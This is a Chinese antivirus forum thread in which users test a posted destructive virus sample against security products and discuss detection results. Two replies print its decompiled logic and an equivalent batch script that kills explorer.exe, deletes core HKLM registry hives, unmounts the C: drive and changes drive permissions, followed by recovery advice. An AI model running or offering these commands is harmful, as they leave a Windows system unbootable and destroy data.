一个破坏型病毒，测测你们的杀软能否防住

显示全部楼层 · 发表于 2020-8-6 09:10:01

马云波波波发表于 2020-8-5 10:41
你的 macfee vse 是否设置并启用了访问保护规则？麦咖啡版区里墨池、叶版规则应该能够防住这一病毒的。

我当时啥规则都没用，直接最大防护规则

显示全部楼层 · 发表于 2020-8-6 09:37:39

提示: 该帖被管理员或版主屏蔽

显示全部楼层 · 发表于 2020-8-6 14:52:59

提示: 该帖被管理员或版主屏蔽

显示全部楼层 · 发表于 2020-8-6 15:06:42

提示: 该帖被管理员或版主屏蔽

显示全部楼层 · 发表于 2020-8-6 16:01:26

杀软病综合医院发表于 2020-8-5 20:20
现在说下简单改MD5之后的双击情况360卫士和卡巴均可拦截，卡巴的学习能力还是很优秀
微点可拦截，根据规则 ...

感谢测试，我们已经调整了主防用于应对此类"病毒", 不过一般恶意程序都是逐利的，像这类"病毒"不会是我们防范重点.

显示全部楼层 · 发表于 2020-8-6 19:48:34

本帖最后由 ZNKZZ. 于 2020-8-6 19:50 编辑

其实完全可以整个bat

Private Sub Form_Load() '402660
loc_004026E3: var_24 = "cmd /c taskkill /f /im explorer.exe"
loc_0040270C: var_7C = "reg delete "
loc_00402721: var_8C = "HKEY_LOCAL_MACHINE\SOFTWARE\Classes"
loc_0040274A: var_9C = " /f"
loc_00402781: var_74 = "reg delete " & Chr(34) & "HKEY_LOCAL_MACHINE\SOFTWARE\Classes" & Chr(34) & " /f"
loc_004027B2: var_7C = "reg delete "
loc_004027CA: var_8C = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide"
loc_004027ED: var_9C = " /f"
loc_00402824: var_74 = "reg delete " & Chr(34) & "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide" & Chr(34) & " /f"
loc_00402855: var_7C = "reg delete "
loc_00402867: var_8C = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
loc_00402890: var_9C = " /f"
loc_004028C7: var_74 = "reg delete " & Chr(34) & "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft" & Chr(34) & " /f"
loc_004028FA: var_eax = Sleep(10000)
loc_00402921: var_24 = "cmd /c mountvol C: /d"
loc_00402952: var_24 = "@echo y|cacls c:\ /d administrator /c"
loc_00402974: GoTo loc_0040299A
loc_00402999: Exit Sub
loc_0040299A: 'Referenced from: 00402974
End Sub

复制代码

显示全部楼层 · 发表于 2020-8-6 20:01:19

ZNKZZ. 发表于 2020-8-6 19:48
其实完全可以整个bat

看起来破坏力挺大，为什么杀软都不识别

显示全部楼层 · 发表于 2020-8-6 20:33:42

好无语，一个低质量的批处理exe，水了这么多层。转换成下面这批处理代码，可以看出很多是多余的。

cmd /c taskkill /f /im explorer.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide " /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft" /f
cmd /c mountvol C: /d
@echo y|cacls c:\ /d administrator /c

复制代码

2、3行多余。4已经包含了3，另外4行执行后重启都蓝屏进不了系统，2也多余了。
最后一行也多余，5执行后，C盘已经不存在了，所以最后一行根本无法执行。

不知道干嘛杀软不拦截对C盘卸载操作：“mountvol C: /d”。不过删除注册表不拦截这点感觉应该算系统的锅，重要注册表项应该只允许TrustedInstaller用户完全控制。

否则被删除重要注册表后，只能在PE备份C:\Windows\System32\config\SOFTWARE文件，用regback目录日期相近的SOFTWARE替换。

regback里的文件需要计划任务定时备份（\Microsoft\Windows\Registry\RegIdleBackup）。

显示全部楼层 · 发表于 2020-8-6 20:37:37

太厉害了，微点免费杀毒根本没反应，害我重新装系统

显示全部楼层 · 发表于 2020-8-6 22:48:32

Lawchake78 发表于 2020-8-5 11:53
又是这一套论调，问题是某些主流防毒产品推出至今已经有近30年的开发历史，也拥有大量从业时间非常长开发 ...

关键是你如果不去主动下载，你是很难遇到这种病毒的，自己主动去下载病毒，没我任何杀软能百分百拦截

共和时代头像被屏蔽	发表于 2020-8-6 09:37:39 \| 显示全部楼层提示: 该帖被管理员或版主屏蔽
共和时代头像被屏蔽
	回复举报

欧阳宣头像被屏蔽	发表于 2020-8-6 14:52:59 \| 显示全部楼层提示: 该帖被管理员或版主屏蔽
欧阳宣头像被屏蔽
	回复举报

共和时代头像被屏蔽	发表于 2020-8-6 15:06:42 \| 显示全部楼层提示: 该帖被管理员或版主屏蔽
共和时代头像被屏蔽
	回复举报

[病毒样本] 一个破坏型病毒，测测你们的杀软能否防住

评分

评分

浏览过的版块